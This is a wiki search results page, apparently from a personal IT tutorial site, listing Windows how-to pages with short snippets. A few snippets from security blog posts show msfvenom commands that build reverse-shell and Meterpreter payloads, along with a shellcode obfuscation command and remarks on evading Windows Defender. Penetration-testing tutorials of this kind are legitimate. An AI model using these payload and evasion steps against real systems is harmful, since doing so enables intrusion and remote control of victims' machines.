Search
You can find the results of your search below.
Matching pagenames:
- Windows
- Windows10
- Windows11
- Windows Bluescreen Analysis
- Deactivate automatic data carrier check
- Security on the net
- Windows Portal
- Left-align taskbar under Windows 11
- NTLDR missing Error message
- Start Microsoft configuration tool
- Start Registry Editor
- Windows restore points
- Disable User Account Control (UAC) completely
- Creating a bootable USB stick
- Reset the registry at an earlier point in time
- Execute repair of Windows 10
- index
- Privilege escalation: Windows admin thanks to Linux
- index
- Execute repair of Windows 10
- Left-align taskbar under Windows 11
- Portal: Windows Essentials
- Start Registry Editor
- Securely overwrite files that have already been deleted
- Provide Windows updates on the installation DVD
- index
- Windows Security - Basics
- User account control under Windows Vista
- Move swap file under XP
- XP takes a very long time to shut down
- Event log cannot be opened
- Windows XP Mode for Windows 7 Home
Fulltext results:
- Windows XP Mode for Windows 7 Home @en:archiv:windows:vista
- ===== Windows XP Mode for Windows 7 Home ===== You often read in forums that XP Mode is only available in the two more expensive versions of Windows 7 (Professional and Ultimate). This is only half right, to be able to use Windows XP Mode you need a Windows XP licence. This is th
- Windows Security - Basics @en:windows:security
- ====== Windows Security - Basics ====== {{template>vorlagen:tutorialdetails|tutname=Windows Sicherheit - Grundlagen|tutautor=[[en:psycore]]|t... rsion=1.0|tutquelle=}} ===== Introduction ===== Windows is the most frequently used operating system and ... ins this step by step. ===== Updates ===== ==== Windows updates ==== In general, Windows updates should
- Tutorials
- stheading;maxns=3;fontsize=100%</ignore>}} ===== Windows ===== ==== Network ==== {{pagequery>@windows:net *;sort<ignore>=title;display=firstheading;maxns=4;fonts... x</ignore>}} ==== Performance ==== {{pagequery>@windows:performance *;sort<ignore>=title;display=firsthea... ndex</ignore>}} ==== Security ==== {{pagequery>@windows:security *;sort<ignore>=title;display=firstheadin
- Left-align taskbar under Windows 11 @en:windows
- {{tag>english windows windows_11 startpage basics}} ====== Left-align taskbar under Windows 11 ====== In Windows 11, the taskbar is centred by default. This can be changed with a few clicks. =====
- Disable User Account Control (UAC) completely @en:windows
- {{tag>english windows_8 windows_10 windows_11 windows}} ====== Disable User Account Control (UAC) completely ====== | @orange: **ATTENTION: User Acco
- Left-align taskbar under Windows 11 @en:windows:11
- ====== Left-align taskbar under Windows 11 ====== In Windows 11, the taskbar is centred by default. This can be changed with a few clicks. ===== Method 1: Windows settings ===== ==== Call up taskbar settings ===... the taskbar * ''Taskbar settings'' click on {{windows:11:screenshot_2023-12-09_171719.png?nolink&200|}}
- Execute repair of Windows 10 @en:windows
- {{tag>english windows windows_10}} ====== Execute repair of Windows 10 ====== Learn how to repair Windows 10 in several ways. ===== Repair in the command prompt ===== Open
- Security on the net @en:windows
- {{tag>blog english it-security windows_10 windows_11 windows}} ====== Security on the net ====== <mermaid> timeline title version history 20... s and Trojan horses."<sup>[[wp>Antivirus]]</sup> Windows Defender offers sufficient basic protection under
- Windows restore points @en:windows
- {{tag>Windows Windows11 english startpage}} ====== Windows restore points ====== ===== Open System Restore ===== Go to the set... point'' and open the following search result: {{windows:sysrestore-1.png?400|}} You will be taken to the
- FatCat Attack PoC @en:it-security:blog
- | Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated ((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) | | @#58D3F7:**Actions on Objectives*... rate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.
- Obfuscation: Disguise shellcode as UUIDs @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: Disguise shellcode a... hat I used for testing was immediately blocked by Windows Defender. I therefore had to adapt the loader and... yption or encoding. This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT
- Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
- {{tag>it-security windows linux blog english}} ====== Privilege escalation: Windows admin thanks to Linux ====== In this tutorial, ... ll show you how to secure administrator rights on Windows PCs using a live boot CD. We will simulate two sc... ystem. \\ \\ ===== Initial situation ===== On a Windows system, the users ''users'' and ''sysadmin'' are
- User account control under Windows Vista @en:windows:security
- ====== User account control under Windows Vista ====== {{template>vorlagen:tutorialdetails|tutname=Vista B... rol|User Account Control]] under [[wpde>Microsoft Windows Vista|Windows Vista]] is an important security feature. It protects the system from unauthorised access th... s, the following settings are required: * [[en:windows:essentials:regedit|Open Registry Editor]] Naviga
- SMB Hardening @en:it-security
- {{tag>english startpage it-security windows active-directory}} ====== SMB Hardening ====== ===== Technical... ights required) as follows: <code powershell>Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol<... ell (restart required): <code powershell>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol<... und here: <code> Computerkonfiguration -> Windows-Einstellungen -> Sicherheitseinstellungen
- Shellcode Injection Part 2 @en:it-security:blog
- {{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 2 ====== {{it-securi... . This form of injection is usually recognised by Windows Defender, so we will again use some obfuscation m... r. The output is binary: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.28.126.97 LPORT=4... ub.com/fritzone/obfy )) was an immediate success. Windows Defender could no longer recognise the compiled f